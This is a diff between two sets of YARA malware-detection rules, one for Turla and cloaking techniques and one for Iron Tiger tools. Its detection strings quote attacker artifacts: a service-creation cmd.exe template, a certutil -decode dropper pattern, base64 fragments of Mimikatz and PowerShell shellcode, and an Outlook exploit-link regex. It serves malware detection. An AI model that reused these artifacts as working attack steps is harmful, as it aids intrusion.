-		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
-		$x3 = "mstotreg.dat" fullword ascii
-		$x4 = "Bisuninst.bin" fullword ascii
-		$x5 = "mfc42l00.pdb" fullword ascii
-		$x6 = "ielocal~f.tmp" fullword ascii
-		$s1 = "%s\\1.txt" fullword ascii
-		$s2 = "%windows%" fullword ascii
-		$s3 = "%s\\system32" fullword ascii
-		$s4 = "\\Help\\SYSTEM32\\" ascii
-		$s5 = "%windows%\\mfc42l00.pdb" ascii
-		$s6 = "Size of log(%dB) is too big, stop write." fullword ascii
-		$s7 = "Log: Size of log(%dB) is too big, stop write." fullword ascii
-		$s8 = "%02d.%02d.%04d Log begin:" fullword ascii
-		$s9 = "\\system32\\win.com" ascii
+		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+		$code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5A4D and ( ( $code1a or $code1b or $code1c ) and $code2 )
 }
-rule SIGNATURE_BASE_MAL_Turla_Sample_May18_1 : FILE
+rule SIGNATURE_BASE_Irontiger_Aspxspy : HIGHVOL
 {
 	meta:
-		description = "Detects Turla samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5052838f-a895-55cb-abcf-813465074127"
-		date = "2018-05-03"
+		description = "ASPXSpy detection. It might be used by other fraudsters"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "3010fcb9-0dbf-59ef-90ce-01d922a95f2d"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/omri9741/status/991942007701598208"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L228-L250"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f5bb26bc787acb89fe5a337121aabc0cd15ed3fd5cbe64ef4e7031e04dc14fb1"
+		logic_hash = "6b5830d3fd6aa346b27788cd4abd581b4724fecc4e880b14dd7b1dd27ef1eea3"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c49c9d601ebf16534d24d2dd1cab53fde6e03902758ef6cff86be740b720038"
-		hash2 = "77cbd7252a20f2d35db4f330b9c4b8aa7501349bc06bbcc8f40ae13d01ae7f8f"
+		tags = "HIGHVOL"
 
 	strings:
-		$x1 = "sc %s create %s binPath= \"cmd.exe /c start %%SystemRoot%%\\%s\">>%s" fullword ascii
-		$x2 = "cmd.exe /c start %%SystemRoot%%\\%s" fullword ascii
-		$x3 = "cmd.exe /c %s\\%s -s %s:%s:%s -c \"%s %s /wait 1\">>%s" fullword ascii
-		$x4 = "Read InjectLog[%dB]********************************" fullword ascii
-		$x5 = "%s\\System32\\011fe-3420f-ff0ea-ff0ea.tmp" fullword ascii
-		$x6 = "**************************** Begin ini %s [%d]***********************************************" fullword ascii
-		$x7 = "%s -o %s -i %s -d exec2 -f %s" fullword ascii
-		$x8 = "Logon to %s failed: code %d(User:%s,Pass:%s)" fullword ascii
-		$x9 = "system32\\dxsnd32x.exe" fullword ascii
+		$str2 = "IIS Spy" wide ascii
+		$str3 = "protected void DGCoW(object sender,EventArgs e)" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+		any of ( $str* )
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr20_1 : FILE
+rule SIGNATURE_BASE_Irontiger_Changeport_Toolkit_Driversinstall : FILE
 {
 	meta:
-		description = "Detects Turla Linux malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f21e7793-a7dd-5195-805d-963827b35808"
-		date = "2020-04-05"
+		description = "Iron Tiger Malware - Changeport Toolkit driverinstall"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "fde2728b-9a23-5f35-9727-0834a7b403da"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/Int2e_/status/1246115636331319309"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L252-L272"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L15-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d463f5a151bb0c3440d719b4c7c0d1ca34de1e0bed7fb9167ecf396607abd3ff"
+		logic_hash = "2ae32596da4f98a0ec2556c2cd87fc7a0f85c37ce96c7163664f2e8cc3ec498d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
 
 	strings:
-		$s1 = "/root/.hsperfdata" ascii fullword
-		$s2 = "Desc|     Filename     |  size  |state|" ascii fullword
-		$s3 = "IPv6 address %s not supported" ascii fullword
-		$s4 = "File already exist on remote filesystem !" ascii fullword
-		$s5 = "/tmp/.sync.pid" ascii fullword
-		$s6 = "'gateway' supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel" ascii fullword
+		$str1 = "openmydoor" wide ascii
+		$str2 = "Install service error" wide ascii
+		$str3 = "start remove service" wide ascii
+		$str4 = "NdisVersion" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_Tinyturla_Sep21_1 : FILE
+rule SIGNATURE_BASE_Irontiger_Changeport_Toolkit_Changeportexe : FILE
 {
 	meta:
-		description = "Detects Tiny Turla backdoor DLL"
-		author = "Cisco Talos"
-		id = "19659ac7-310a-52dd-a94c-022c7add752b"
-		date = "2021-09-21"
+		description = "Iron Tiger Malware - Toolkit ChangePort"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "2ba74413-5f72-560a-8567-1c4bf3357097"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/2021/09/tinyturla.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L275-L295"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L31-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ede598374bc4a8a870aa29498be4200b4a3d7b289dfcb680fb3f91108d212bca"
+		logic_hash = "b5a5a1cff372d97bfa281d297b6230279cd1526c5df636efe4dec3aa3d923edf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "030cbd1a51f8583ccfc3fa38a28a5550dc1c84c05d6c0f5eb887d13dedf1da01"
 
 	strings:
-		$a = "Title: " fullword wide
-		$b = "Hosts" fullword wide
-		$c = "Security" fullword wide
-		$d = "TimeLong" fullword wide
-		$e = "TimeShort" fullword wide
-		$f = "MachineGuid" fullword wide
-		$g = "POST" fullword wide
-		$h = "WinHttpSetOption" fullword ascii
-		$i = "WinHttpQueryDataAvailable" fullword ascii
+		$str1 = "Unable to alloc the adapter!" wide ascii
+		$str2 = "Wait for master fuck" wide ascii
+		$str3 = "xx.exe <HOST> <PORT>" wide ascii
+		$str4 = "chkroot2007" wide ascii
+		$str5 = "Door is bind on %s" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
 }
-rule SIGNATURE_BASE_SUSP_BAT_Aux_Jan20_1 : FILE
+rule SIGNATURE_BASE_Irontiger_Dllshellexc2010 : FILE
 {
 	meta:
-		description = "Detects BAT file often dropped to cleanup temp dirs during infection"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c97f189e-a0c2-532e-b087-8669da72a2ad"
-		date = "2020-01-29"
+		description = "dllshellexc2010 Exchange backdoor + remote shell"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "960e8e5c-65a5-5dd2-90fa-1f7d31ee8cb5"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_bat_aux.yar#L2-L19"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b8cd9b7683a18a02a81222d6819fe903500702c83f198f73ac428d1bc91fb9a"
-		score = 65
+		logic_hash = "b75477f01627ac05013c5e4ccb1d58a6bb25bfbe83ad0cec392140d44637a028"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "f5d558ec505b635b1e37557350562ad6f79b3da5cf2cf74db6e6e648b7a47127"
 
 	strings:
-		$s1 = "if exist \"C:\\Users\\" ascii
-		$s2 = "\\AppData\\Local\\Temp\\" ascii
-		$s3 = "del \"C:\\Users\\" ascii
-		$s4 = ".bat\"" ascii
-		$s5 = ".exe\" goto" ascii
+		$str1 = "Microsoft.Exchange.Clients.Auth.dll" ascii wide
+		$str2 = "Dllshellexc2010" wide ascii
+		$str3 = "Users\\ljw\\Documents" wide ascii
+		$bla1 = "please input path" wide ascii
+		$bla2 = "auth.owa" wide ascii
 
 	condition:
-		uint8( 0 ) == 0x3a and filesize <= 1KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
 }
-rule SIGNATURE_BASE_Gen_Base64_EXE : HIGHVOL FILE
+rule SIGNATURE_BASE_Irontiger_Dnstunnel : FILE
 {
 	meta:
-		description = "Detects Base64 encoded Executable in Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef919a63-9a29-5624-a084-b92e3578e3a6"
-		date = "2017-04-21"
+		description = "This rule detects a dns tunnel tool used in Operation Iron Tiger"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "7f24d3dd-4301-5b12-8262-4cc5f6578a4b"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L71-L90"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L65-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fe18ee727a836c0baaac4dbbffdb9f50065f56a4c6eeee7e54792a8a66229de"
+		logic_hash = "84b7dec3a89fe309149c7a3141279755adafbf793521c7b9b4031827f1020d7d"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" wide ascii
-		$s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" wide ascii
-		$s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" wide ascii
-		$s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" wide ascii
-		$s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" wide ascii
-		$fp1 = "BAM Management class library"
+		$str1 = "\\DnsTunClient\\" wide ascii
+		$str2 = "\\t-DNSTunnel\\" wide ascii
+		$str3 = "xssok.blogspot" wide ascii
+		$str4 = "dnstunclient" wide ascii
+		$mistake1 = "because of error, can not analysis" wide ascii
+		$mistake2 = "can not deal witn the error" wide ascii
+		$mistake3 = "the other retun one RST" wide ascii
+		$mistake4 = "Coversation produce one error" wide ascii
+		$mistake5 = "Program try to use the have deleted the buffer" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $str* ) ) or ( any of ( $mistake* ) ) )
 }
-rule SIGNATURE_BASE_Binary_Drop_Certutil : FILE
+rule SIGNATURE_BASE_Irontiger_EFH3_Encoder : FILE
 {
 	meta:
-		description = "Drop binary as base64 encoded cert trick"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19791e51-d041-524d-80fa-9f3ec54eb084"
-		date = "2015-07-15"
+		description = "Iron Tiger EFH3 Encoder"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "ec30782e-8fe9-5843-9db4-5a3c477b7f25"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/9DNn8q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L92-L107"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L86-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e2b62442b5da6ab887e1eb03cdd44932651fa51ce11e87e6fc29015e708d2f3"
-		score = 70
+		logic_hash = "e620222f815a6c915e372c11d28c480179fd2abdb139ed6984ca5a7a61b8088c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
-		$s1 = "echo -----END CERTIFICATE----- >>" ascii
-		$s2 = "certutil -decode " ascii
+		$str1 = "EFH3 [HEX] [SRCFILE] [DSTFILE]" wide ascii
+		$str2 = "123.EXE 123.EFH" wide ascii
+		$str3 = "ENCODER: b[i]: = " wide ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and ( any of ( $str* ) )
 }
-rule SIGNATURE_BASE_Stegokatz : FILE
+rule SIGNATURE_BASE_Irontiger_Getpassword_X64 : FILE
 {
 	meta:
-		description = "Encoded Mimikatz in other file types"
-		author = "Florian Roth (Nextron Systems)"
-		id = "78868bb0-af69-573d-afd2-350a46f69137"
-		date = "2015-09-11"
+		description = "Iron Tiger Malware - GetPassword x64"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "8f55b23f-52fd-5106-9112-6cffa97269ab"
+		date = "2023-01-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/jWPBBY"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L109-L123"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L101-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "091b07220d2a89822aa382edcecf5869d463e375747cc41f52417e66ccf0e2da"
-		score = 70
+		logic_hash = "2adabc629fcd4bc89a015874376daf51b2a367bb13ec25e917e5d899080d8a74"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
-		$s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
+		$str1 = "(LUID ERROR)" wide ascii
+		$str2 = "Users\\K8team\\Desktop\\GetPassword" wide ascii
+		$str3 = "Debug x64\\GetPassword.pdb" ascii
+		$bla1 = "Authentication Package:" wide ascii
+		$bla2 = "Authentication Domain:" wide ascii
+		$bla3 = "* Password:" wide ascii
+		$bla4 = "Primary User:" wide ascii
 
 	condition:
-		filesize < 1000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
 }
-rule SIGNATURE_BASE_Obfuscated_VBS_April17 : FILE
+rule SIGNATURE_BASE_Irontiger_Gtalk_Trojan : FILE
 {
 	meta:
-		description = "Detects cloaked Mimikatz in VBS obfuscation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ca60b885-bb56-55ee-a2b3-dea6958883c2"
-		date = "2017-04-21"
+		description = "Iron Tiger Malware - GTalk Trojan"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "3d72660b-c470-5e63-a83d-990d3c5a696c"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L125-L137"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L121-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "590dca22a4fcbc2bbfb4358c53f7cb6c06824970139cca251c4cf1bd435817b0"
+		logic_hash = "9b6139d34ad91db2e418668be9ca947442ff614a241f0c1aa61f8334af5421c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "::::::ExecuteGlobal unescape(unescape(" ascii
+		$str1 = "gtalklite.com" wide ascii
+		$str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" wide ascii
+		$str3 = "D13idmAdm" wide ascii
+		$str4 = "Error: PeekNamedPipe failed with %i" wide ascii
 
 	condition:
-		filesize < 500KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
 }
-rule SIGNATURE_BASE_Obfuscated_JS_April17 : FILE
+rule SIGNATURE_BASE_Irontiger_HTTP_SOCKS_Proxy_Soexe : FILE
 {
 	meta:
-		description = "Detects cloaked Mimikatz in JS obfuscation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "44abd2c0-5f8d-5a8c-b282-a09853e12054"
-		date = "2017-04-21"
+		description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "6ead3d61-c1e3-55d1-894e-ab57bcd09cde"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_cloaking.yar#L139-L153"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L137-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c75bf0ad8dd35fabbaedb54c2630249497edbb215b6ce2b707e32f82e8fb8f56"
+		logic_hash = "f262751727de3d47a8d7cdc1f8ba8d92f4f60e22bc4e897bd5e53a8f2c118c95"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\";function Main(){for(var " ascii
-		$s2 = "=String.fromCharCode(parseInt(" ascii
-		$s3 = "));(new Function(" ascii
+		$str1 = "listen SOCKET error." wide ascii
+		$str2 = "WSAAsyncSelect SOCKET error." wide ascii
+		$str3 = "new SOCKETINFO error!" wide ascii
+		$str4 = "Http/1.1 403 Forbidden" wide ascii
+		$str5 = "Create SOCKET error." wide ascii
 
 	condition:
-		filesize < 500KB and all of them
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $str* ) )
 }
-rule SIGNATURE_BASE_Base64_PS1_Shellcode
+rule SIGNATURE_BASE_Irontiger_Nbddos_Gh0Stvariant_Dropper : FILE
 {
 	meta:
-		description = "Detects Base64 encoded PS1 Shellcode"
-		author = "Nick Carr, David Ledbetter"
-		id = "7c3cec3b-a192-5bfd-b4f1-22b1afeb717e"
-		date = "2018-11-14"
+		description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "3610b9e3-45f8-5a8d-8977-817160009818"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1062601684566843392"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps1_shellcode.yar#L1-L15"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L154-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fac6f41965eb2209f1552763800d6a2b172f28cd29bb7586d180654aab1e6d56"
-		score = 65
+		logic_hash = "e877c52d5cb0067388e9a138f48dcf7d3bd6d7d491eea6acffb2527ba0a906c7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$substring = "AAAAYInlM"
-		$pattern1 = "/OiCAAAAYInlM"
-		$pattern2 = "/OiJAAAAYInlM"
+		$str1 = "This service can't be stoped." wide ascii
+		$str2 = "Provides support for media palyer" wide ascii
+		$str4 = "CreaetProcess Error" wide ascii
+		$bla1 = "Kill You" wide ascii
+		$bla2 = "%4.2f GB" wide ascii
 
 	condition:
-		$substring and 1 of ( $p* )
+		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
 }
-
-rule SIGNATURE_BASE_MAL_Cryprat_Jan19_1 : FILE
+rule SIGNATURE_BASE_Irontiger_Plugx_Dosemulator : FILE
 {
 	meta:
-		description = "Detects CrypRAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f3063a16-8813-5d6c-9807-6a0725907fb5"
-		date = "2019-01-07"
+		description = "Iron Tiger Malware - PlugX DosEmulator"
+		author = "Cyber Safety Solutions, Trend Micro - modified by Florian Roth"
+		id = "e601d91d-49e6-5fe9-b70b-fb1fb6c4f059"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_cryp_rat.yar#L3-L19"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L171-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69f8a581bae1a2c411e09e8fe01a979645ef897038af868d8e9f2a2ce9188080"
-		score = 90
+		logic_hash = "502adc142b0f7a2980b4b851f2360086cec855b5e9851a6e9afbaba1846d11ed"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Cryp_RAT" fullword wide
+		$str1 = "Dos Emluator Ver" wide ascii
+		$str2 = "\\PIPE\\FASTDOS" wide ascii
+		$str3 = "FastDos.cpp" wide ascii
+		$str4 = "fail,error code = %d." wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "2524e5e9fe04d7bfe5efb3a5e400fe4b" or 1 of them )
+		uint16( 0 ) == 0x5a4d and 2 of ( $str* )
 }
-rule SIGNATURE_BASE_EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 : CVE_2024_21413 FILE
+rule SIGNATURE_BASE_Irontiger_Plugx_Fastproxy : FILE
 {
 	meta:
-		description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"
-		author = "X__Junior, Florian Roth"
-		id = "4512ca7b-0755-565e-84f1-596552949aa5"
-		date = "2024-02-17"
-		modified = "2024-02-19"
-		reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2024_21413.yar#L2-L20"
+		description = "Iron Tiger Malware - PlugX FastProxy"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "14e05823-6288-5f02-8060-add51084c446"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L187-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "06cfafe0b92949e493dca6d54f671d0607242d97341144b69f563a0cc24dc6a1"
+		logic_hash = "6659595f65b445d2bd69b13b8d01c2dd78b5c055fa39f810a61646d9408df2ff"
 		score = 75
-		quality = 60
-		tags = "CVE-2024-21413, FILE"
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$a1 = "Subject: "
-		$a2 = "Received: "
-		$xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/
+		$str1 = "SAFEPROXY HTServerTimer Quit!" wide ascii
+		$str2 = "Useage: %s pid" wide ascii
+		$str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" wide ascii
+		$str4 = "p0: port for listener" wide ascii
+		$str5 = "\\users\\whg\\desktop\\plug\\" wide ascii
